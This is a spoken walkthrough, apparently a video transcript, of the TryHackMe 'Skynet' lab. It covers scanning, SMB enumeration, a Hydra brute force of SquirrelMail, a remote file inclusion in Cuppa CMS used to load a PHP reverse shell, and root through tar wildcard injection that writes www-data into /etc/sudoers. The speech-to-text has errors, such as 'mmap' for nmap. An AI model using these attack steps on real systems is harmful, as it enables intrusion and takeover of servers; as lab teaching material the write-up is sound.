Hey guys, it's Ben, and today I'm going to be walking through the Skynet TryHackMe challenge. This was a really cool one. The privilege escalation part I really found interesting, so let's get on with it. So I'm going to zoom in a bit so we can see. I'm going to cd into, without on cap, cd into desktop, TryHackMe. I'm going to make directory Skynet walkthrough. I'm going to cd into Skynet walkthrough. I'm going to make directory mmap recon exploits, and there we go. I'm going to clear these up, and I'm going to start with an initial mmap scan. I'll zoom that one in as well. There we go. I'll start off with an initial mmap scan. Mmap. Just do this. Mmap, and I'll output this to initial.txt. So we see there's a few ports open, right? We've got SSH, HTTP, POP3, NetBIOS, and IMAP. So let's do a bit of a thorough scan now. I'm just going to cd into mmap, cat out initial so I can copy from those. I'm going to do service enumeration, default scripts, and operating system enumeration, and the ports are 2020, 22, 80, 110, 139, 143, and 445. Right, that's the IP. We're going to output nmap thorough.txt. I need to be sudo, so I'm going to go sudo like so. Clear that up. So we've got this website we want to look at. We've got this like Skynet website, right? There's these search features. If you inspect and look at the thingy, look at the network traffic, we can see we take a post request, right, and we submit something. So it doesn't look like anything's returned to us back. It's just web page as it was. So that's a bit awkward. If we did star to see if like we could get return all results, there's not much functionality here. If you use Wappalizer, we can see look, there's an Apache HTTP server and it's running on Ubuntu. So you can start having a look around, like is there an admin, do I have permission, is there a robots.txt, right? Robots.txt we can't find. So I went to do some more automated like enumeration. So what I will do is just sudo vi etc hosts, so I don't have to keep on entering this all the time. I'm going to call this one Skynet.TryHackMe, right? There we go. So I'm going to start off with a word list fuzzing. Directory fuzzing with a word list. Word list, sec lists, discovery, web content, directory list 1.0, and it's going to be Skynet.TryHackMe. We saw we got a 404 not found error earlier, so I can filter for code 404, and then I'm going to tee this to fuff initial.log. What have I done wrong here? Haven't specified what I want to fuzz. There we go. So I'll let that do its thing, right? We can look back at the mmap scan. We can see some more results. So look, we can see, yeah, what we already know, it's a Apache web server, right? Yeah, it's running Linux. It's running Ubuntu. There was this Samba server, an SMB service we can interact with. So if you look back to the NSC scans which are on, we can see, look, guest authentication is allowed, possibly, so we can try that out, right? We can go down to SMB map, and I'm just going to map out Skynet.TryHackMe, and I'm going to tee this into recon SMB map.log. We'll see what we find here. And we find these shares. We find this anonymous share, Miles Dyson, and IPC. We can see we only have read access on the anonymous share. The others we can't access. So I'm just going to cd into recon. I'm going to actually connect to this. So Skynet.TryHackMe, anonymous, right, and we can authenticate with null authentication, and we'll get in and we see, look, there's this attention, so we can get attention.txt, and there's these logs, so cd into logs, we can ls, we see there's 3 logs here, right, there's log 1, 2 and 3, log 3 and 2 are both empty, there's no bytes, so I'm only interested in log 1, so I'm going to get that. We've got these logs here, so I can cut out attention. A recent system malfunction caused various passwords to be changed. All Skynet employees are required to change their password after seeing this. So that's something interesting. And if you cut out log 1, we can see it looks like this is a possible list of passwords. Where these passwords are used so far, I'm not sure. We've got an SMB service we can try brute force the passwords on. But like I said, I'm not 100% sure where else to go from here. We've also found this squirrel mail directory, so we can have a look at this, right? And we've got this like login form for squirrel mail login. If you search this up, squirrel mail, this is like a real thing. You can have a look for any vulnerabilities, and there are stuff, but there's no authentication bypasses. So perhaps we're gonna have to log into here. If you look at the flags, the first flags is, I don't want to give it away, but what's Mars' password for his email? So perhaps this is where we log into the email, and we have to get his password. So we're going to try brute force this login form. We want to get access basically. If we just do a test. Oh, and one thing I forgot to mention in the attention.txt, right? There's this Miles Dyson. Perhaps the username, if we just put up notes.txt here, notes.txt, there we go. We can see, look, there's some possible usernames. We know there's a Miles Dyson user, so perhaps that's M Dyson or Miles Dyson, or yeah, that's the 2 I can think of. M.Dyson. There's a few, but let's just try the obvious ones at first. And then we've got this list of passwords we can try. So we've got somewhere we can log in or attempt to log in, and you can see when you put in your credentials, there's a post request to this squirrel mail /source /redirect.php, and in the post data we've got this login username, secret key, which is the password we've provided, and these JS autotech results. So I tried using Hydra, so I'll get Hydra going. So Hydra, we've got a list of passwords, which is actually in this notes.txt, right? No, sorry. Yeah, we've got a list of usernames in this notes.txt, and we've got a list of passwords in this log1, or possible passwords. The domain we're trying to actually log into is this Skynet.TryHackMe. How the attack we're doing, or the protocol we're using to attack, is HTTP post form, and then we supply the URL there. We need to put / there, and then you supply the next you supply the form of the data, right? And there's this login username, so we can say login username equals, and then we'll use the usernames in this users. So we say user, and then secret key is what the password is, right? Secret key is pass. There's this JS auto detect results. This is always set to 1, right? And then just logged in is equal to 1. So we can try brute force this. One thing we do need to add is a filter, so it knows when to accept or reject a login attempt. And we can see when it fails, there's this unknown user. So I can just say unknown user. Hopefully this will reject some of the the failures, or all of the failures, and then only show us the correct one. So I'm going to go with that. I'm also going to use TAC V for the verbose mode so we can see what it's attempting, see if it's all working, and I'll let that do its thing. Right, we'll clear this up. So we're going to see if we can find some possible credentials for the mail. We see we also do have POP3 and IMAP. You can try brute force those credentials. Okay, so this is doing it wrong. Yeah, this is doing it wrong. So let's just do this manually then. So let's just start Miles Dyson, unknown user. There we go. Try this again. And then look, we find some credentials. So actually it's saying these are all working, which is incorrect. So I've done something wrong. Is it in my filtering? Do I need to go like this? I've definitely done something wrong because it shouldn't show all being correct. Oh, unknown. I wasn't spelling it right. Let's try this again. See if this returns a set of credentials we can use. And look, it's returned this Cyborg Halo Terminator, this time only one of them, so I can put this up here. There we go. I'll write this here. We've got that copied, so we can go back here to the login page. We can use Miles Dyson and log into the emails. There's this Samba password reset. So that in that SMB anonymous one, they said you need to change your password. There's this, I guess, temporary password for this Miles Dyson user. So we can perhaps now, if you go back up to the, where is it, SMB client or SMB map. Oh, I've actually saved it in here, so I can just look at it locally. So cat SMB map.log. There was this Miles Dyson share. So what we can do is use SMB client, this time using the Miles Dyson share with the user Miles Dyson, and then we'll paste in that password, which is wrong. So did I actually copy it? Was it the last one I copied? And we've got something wrong. What have I done wrong? Miles Dyson, that looks correct. I wonder, I don't know why this would be. I didn't use the domain originally. So 10.10.182.110, 10.10.182.110. Password is this. I'm getting this logon failed for some reason. So I'm not 100% sure why. Am I actually doing that correct? No, is that right? So it's this user Miles Dyson, and his password is that. That is bizarre. For some reason this one here is, oh no, yeah. Let's see if we can actually connect to like this anonymous one still, or is it? Yeah, I can still connect to that. It's just this one here. SMP client, Miles Dyson, user Miles Dyson. And I'll just make sure I'm copying it correctly. So that is the right password there, and I can paste it somewhere else just in case it's not letting me paste. Yeah, that is right. And I paste it there, and I'm in. I've got no idea why it didn't let me before, but I'm in now. Okay, wasted your CD notes. You can see, look, actually I'll go back out there, right? So there's a lot of nonsense. These PDFs sort of are trying to keep you off the real, what we're really looking for. There's this notes directory here. You can go in here, and if you look in here, you'll see there's this important.txt. We can get important.txt onto our box. We can exit, and we can cat out this important. It says add features to beta CMS, and then we've got this, it looks like directory path, so we can go to this, right? We can see what is at this location, and we've got this Miles Dyson personal page. You can look in the source code. There's not much. What I did then is I fuzzed again, so I've got it up here. So I'm going to fuzz now from here onwards. So I'm going to fuzz, is there any directories going further on? And I'm going to do output this is secondary.log, and then we'll see what that finds. We'll let it do its thing. See if it finds anything. Have I done the command right? Because I'm sure it was earlier. Filter, yep. Maybe it is. I'll just let that. I want to zoom in. Don't want to do that. I'll let that do its thing. You can sort of see if you look. It's now showing like the PHP. That PHP used somewhere. That's definitely useful if you go to. There's this Miles. Or maybe I'm using the wrong word list. Let's try a different word list, right? Skynet, this fuzz. I just want to check if I go to non-existent directory. HTTP Skynet. What was this one called? Oh, I stopped the command. Shit. CD into recon. Oh, yeah, that was in the important. I do know what the directory we're looking for is, but I don't want to sort of cheat. I want to do this, show you how I actually went through this challenge, but it seems like I'm not able to replicate it. There we go. So we've got this here. I'll try a different word list just in case if that's the reason. I'll try directory list 2.3. Just big one. Let's see if that gets it. I'll let that do its thing. It has found it. It's this administrator folder. So it was because I was using the wrong word list. But there's this. Oh fuck's sake! There was this mind my French. There's this administrator folder, and that is not what I wanted to go to. I wanted to go to. Make sure that's there. Administrator like this, and we get this Kappa CMS login page. So I'm not going to go through attempting the credentials that we've already gained or using Hydra to brute force any further credentials, as I tried that and it didn't work. What you can do is fuzz this further and you'll find perhaps some files. You can also look when this is loaded. This opens a lot of files, so you could look around here. You may find some ones which are interesting. If you just search up Kappa CMS vulnerabilities, and just going back to this, we can get some more flags. We've got Mars password. What's this hidden directory? And then there's a vulnerability. You can include remote files for malicious purposes. So this is actually the exploit I used. And there's this apparently LFI, RFI on this endpoint. So if we just go to this endpoint here and see what we see. Nope. Sorry about this. HTTP. There we go. We get this field configuration. If you actually look at the POC and what it says there's this URL config get parameter, so we can see if we can drop the Etsy password file just to confirm. Look, we've got LFI. Do we have RFI? Can I, for example, go to 127 like this, and it looks like I can. This was the original page. I can include that, so I can include remote websites, remote web pages. So I can try basically upload a reverse shell. If I copy from my desktop this PHP reverse shell, I'm just going to edit this. I've got this reverse shell. Is it down like 50? There we go. Where's the variable set at? There we go. I've got this reverse shell, and we'll try upload this. So 98.238 port 1234. That's okay. I'm now going to get HTTP server going, and then I'm going to include 10.18.98.238 /PHP reverse shell. And before I do this, before I actually execute this, let's get a listener going. So netcat listener 1234, get a listener going, enter. Fuck's sake, sorry, this is annoying me. HTTP, and I'm going to have to edit this again. 10.18.98.238 PHP reverse shell.php, and it hangs. If you go back here, we've got a callback, so we've got access to a reverse shell. You can say like, who am I? Currently running this data. It's not really a nice terminal, so I'm going to fix that. Import pty.spawn bin bash. Right, there we go. We've got a bit of a nice shell. I'm going to export term equals xterm so I can clear my terminal. And I'm going to cd into home. We can see there's this Miles Dyson user. So Miles Dyson. I'm going to cd. First of all, let's get the user.txt flag. There we go, nice. If you look at this, we can try, obviously, privilege escalate to Miles Dyson using some of the passwords we gained. I did that, and I figured that actually hinders what we're trying to do to get to root. So I was only able to privilege escalate from data to root. I wasn't able to go from Miles Dyson to root. But I'll show you how I did it. We can see, look, there's this backups directory owned by root in Miles Dyson's home directory. So let's just investigate this, right? We've got this backup.sh and this tar backup.tjz file. So I'm going to ls-tech-la, list out the contents. We can see, look, there's this backup.sh script owned by root, but we can execute it and we can read it. So we can say, look, what is this doing? And we can see it's using, first of all, it's starting a shell, it's changing directory to var html, and then it's using tar to compress all the files and save them to this backup.tgz. If you look at the time this is ran, it's ran at the 08th minute, it's 09 at the moment. That's fairly recently. I wonder if this is, it's running on the same day. I wonder if this is perhaps running as a cron tab. So we can cat out etc cron, right? Etc cron. Let me just cd and find what this is actually called. Yep, cat etc cron tab. We can see it's running this script as root every minute. So we can go back to this script and we can have another look. Just now we know this script is being running as root. I'm pretty sure this is the privilege escalation vector. We can cd into backups. We can, catalbackup.sh. So it's running this script every minute as root. So root is the person running the script, and it basically tars this whole directory, all the files in this directory, and outputs to this file. It's using a wildcard to get all the files in var.html. We have write access over var.html, so we can include what is put on the output. When it uses tar, you can think in the back end of Linux, it's doing this, and if I just cd into var.html, right, what it will be doing is it will be running tar, it will be compressing, and it will output to this folder here. Right, I'm not going to complete it all, and then this wildcard will be replaced individually by all the file names. So it will start to be going like admin, AI, config, ... all the way onto styles dot css. So it manually replaces the star with all of these files in this directory, and that's how it runs the command. What we can do is, because we have write access to this file, we can add certain files with specific file names, so it changes the logic of the tar command. So there's this, and I may have to search this up. You can search up, like, right, this is what I did, tar wildcard injection, and there's loads of different things. This is like a well-known thingy. We can basically create our own file names such that they are commands to the tar for tar. So when it runs, like I said earlier, it will run them thinking the file names are not actually file names, they're commands to be run with tar. So, for example, we can do this, right? We can say we want to echo out nothing, and we want to output this to checkpoint equals 1. And if we go here, there's this checkpoint equals 1. When the tar uses the wildcard and it will put all the file names in, it will not think this checkpoint 1 is a file. It will actually think it's a flag for a command, and the command is checkpoint 1. We can chain together, we can make 3 of these files, and I'll do another one now. So we can do echo, and I'll output the file name to be checkpoint action. So this is what we want to do. Checkpoint action equals exec. I want to execute something, and what I want to execute is this. I'll create this privesc.sh. So I'm going to create an actual shell script which will run. So let's check this works. We've got these. I forgot to, let me do this again. I forgot to specify like this checkpoint, because it won't think. In this case here, this may mess it all up now, but we'll see. Checkpoint action equals exec sh privesc.sh. That looks right. So we've now got these 2 file names which will be interpreted when tar is run as flags. We finally need to create this echo, and now what I'm going to do now, this is where I'm going to create this privesc script, and there's a few ways you can do this, but this privesc script you could either perhaps set up a reverse shell in this .sh file, or what I did, which I think is quite creative, is created, I added my user to the sudoers file. So for example, we've got echo, and what I want to echo out is this www data, all equals root, so I'm giving me basically root access. The user account I'm running as now root access with no password on all commands. So I can run all commands as sudo without root access. And I want to, I want to pipe this into etc sudoers like so, and I want to finish this command. So what I'm doing is echoing the inside of this into a text file. When it runs and it executes this, it will echo again this command, and it will pipe that into etc sudoers, and I'll need to use a single quote there. And now I'm going to pipe this echo into the file name privesc.sh. So I believe this should work. If I let's just clear and have a look. We can cat it out. So cat privesc.sh, and we can see, look, the command which will be run is, will add www data with sudo access without a password to the etc sudoers file. When this cron tab runs and it's running as root, it will add this to the sudoers file, and then I should hopefully get sudo access. If I do this now, for example, it's asking for a password, so I'm going to do this in a minute and see if we've got this capability. So I'll wait. It may be a minute, it may be a bit long, a few seconds longer. We'll see. We can go in Miles Dyson, and we can tack out, and we can see when the command is actually run. I'll go in backups. We can see, look, last time it was run was 14, or this 17 minutes past. So maybe I'll have access now. And look, now, before it was prompting me for the password, when this cron tab ran, it basically, the cron tab executed a tar. The flags of the tar command executed a bash script, and that bash script injected into the etc sudoers file access. So now I can go sudo su, and I'm root, and that's quite cool. I can cd into root, and I can cat out the root.txt. So that's how you privilege escalate. There was a few different things you could have done at this point. CD into CD into home Skynet backups. When I say there's a CD into home, CD into Skynet, CD into Miles Dyson, that's the one. CD into backups, right? When I mean there's a few things we can do, I've written some notes over here, right? I did this one here where you echoed out your user account and saved it into this privesc.sh file. You could have also given a binary on the machine suid access. You could have given it the sudo privileges, and then you would have been able to privilege escalate that way, or you could have included a reverse shell into that privesc. So there was a few different things I could have done. I thought this one here was quite neat, and adding the current user to the sudoers file. But yeah, that's about it. We've got all the flags, so yeah, I hope you've enjoyed.